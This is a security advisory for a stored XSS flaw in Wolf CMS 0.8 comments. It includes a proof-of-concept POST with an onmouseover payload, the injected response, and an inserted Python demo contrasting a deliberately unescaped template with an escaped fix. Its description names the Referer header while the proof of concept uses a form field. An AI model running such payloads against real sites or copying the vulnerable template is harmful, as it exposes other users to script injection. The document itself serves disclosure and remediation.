Wolf CMS 0.8 Cross Site Scripting

2016-10-09T00:00:00
ID PACKETSTORM:139038
Type packetstorm
Reporter Mattia Reggiani
Modified 2016-10-09T00:00:00

Description

[+] Title  
Wolf CMS 0.8 - Stored Cross-Site Scripting (XSS) Vulnerability  
  
[+] Credit  
Mattia Reggiani (info@mattiareggiani.com)  
  
[+] Advisory  
https://github.com/mattiareggiani/Security-Advisories/blob/master/MR-16-03_WolfCMS.pdf  
  
[+] Vendor Homepage  
https://www.wolfcms.org/  
  
[+] Affected Version  
0.8  
  
[+] Tested on  
Ubuntu Server 14.04, web server Apache 2.2.31  
  
[+] CVE  
N/A  
  
[+] Severity  
High  
  
[+] Summary  
Wolf CMS is an open source content management system which simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management. Wolf CMS is written in PHP and supports MySQL, SQLite 3 and PostgreSQL as database backends.  
Wolf CMS is prone to stored cross-site scripting (XSS) vulnerabilities, which could be used by malicious users to inject arbitrary JavaScript code into a victim's browser.  
  
[+] Vulnerabilities  
[+][+] Stored Cross Site Scripting (XSS)  
# Description: Multiple stored XSS vulnerabilities have been found in the HTTP Referer header. This can lead to arbitrary client-side code execution (e.g. JavaScript).  
# Proof of Concept:  
>HTTP Request  
POST /wolfCMS/?about-us/sdgdfgdfsg.html HTTP/1.1  
[Headers]: ...  
[Post Data]:  
comment%5Bauthor_name%5D=%22+onmouseover%3Dprompt%28%221337%22%29+bad%3D%22&comment%5Bauthor_email%5D=xss%40xss.xss&comment%5Bauthor_link%5D=website&comment%5Bauthor_ip%5D=127.0.0.1&comment%5Bbody%5D=Test+2+Cross+Site+Vulnerability+%28XSS%29&commit-comment=Submit+comment   
  
>HTTP Response  
...  
<p> A <a href="http://website" title="" onmouseover=prompt("1337") bad="">" onmouseover=prompt("1337") bad="</a> <small class="comment-date"></small></p>  
...  
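As an added example (not from the advisory or from Wolf CMS's own code), the Python below parses the POST body of the proof of concept above, reproduces the unescaped attribute interpolation that the response fragment shows, and contrasts it with attribute-context escaping via `html.escape`. The render functions and the markup template are assumptions modelled on the response fragment; the check at the end parses the rendered HTML to confirm whether the submitted value stayed inside the `title` attribute or spilled out as new attributes.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample: the POST body from the advisory's proof of concept
# (only the comment[...] fields are needed for rendering).
POST_BODY = (
    "comment%5Bauthor_name%5D=%22+onmouseover%3Dprompt%28%221337%22%29+bad%3D%22"
    "&comment%5Bauthor_email%5D=xss%40xss.xss&comment%5Bauthor_link%5D=website"
    "&comment%5Bbody%5D=Test+2+Cross+Site+Vulnerability+%28XSS%29"
)


def parse_comment(body: str) -> dict:
    """Return the comment[...] fields of a URL-encoded form body as a dict."""
    fields = parse_qs(body, keep_blank_values=True)
    return {
        key[len("comment["):-1]: values[0]
        for key, values in fields.items()
        if key.startswith("comment[") and key.endswith("]")
    }


def render_comment_vulnerable(author_name: str, author_link: str) -> str:
    """Hypothetical template: raw interpolation into an attribute and a text node,
    which mirrors the markup seen in the advisory's HTTP response."""
    return (
        f'<p> A <a href="http://{author_link}" title="{author_name}">'
        f'{author_name}</a> <small class="comment-date"></small></p>'
    )


def render_comment_fixed(author_name: str, author_link: str) -> str:
    """Same template with attribute-context escaping: quote=True encodes
    & < > " ' so a submitted value can never close the surrounding quotes."""
    name = html.escape(author_name, quote=True)
    link = html.escape(author_link, quote=True)
    return (
        f'<p> A <a href="http://{link}" title="{name}">'
        f'{name}</a> <small class="comment-date"></small></p>'
    )


class _AnchorAttrs(HTMLParser):
    """Collects the attribute dict of every <a> tag encountered."""

    def __init__(self) -> None:
        super().__init__()
        self.anchors = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.anchors.append(dict(attrs))


def anchor_attributes(rendered: str) -> dict:
    """Parse rendered markup the way a browser tokenizer would and return the
    attributes of the first <a>; an injected onmouseover shows up as a key here."""
    parser = _AnchorAttrs()
    parser.feed(rendered)
    return parser.anchors[0] if parser.anchors else {}


if __name__ == "__main__":
    comment = parse_comment(POST_BODY)
    for label, render in (("vulnerable", render_comment_vulnerable),
                          ("fixed", render_comment_fixed)):
        out = render(comment["author_name"], comment["author_link"])
        attrs = anchor_attributes(out)
        print(f"[{label}] {out}")
        print(f"[{label}] anchor attributes: {sorted(attrs)}")
```

Running the script prints the same broken `<a ...>` tag that appears in the advisory's response for the vulnerable renderer, with `onmouseover` and `bad` showing up as real attributes, while the escaped renderer keeps the whole submitted string inside `title`. Attribute-context escaping on output is the fix; the stored value itself can stay untouched in the database.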
  
[+] Disclosure timeline  
# Discovery: 05/06/16  
# Vendor disclosure: 09/06/16  
# Vendor acknowledgment: N/A  
# Patch release: N/A  
# Public disclosure: 19/07/16  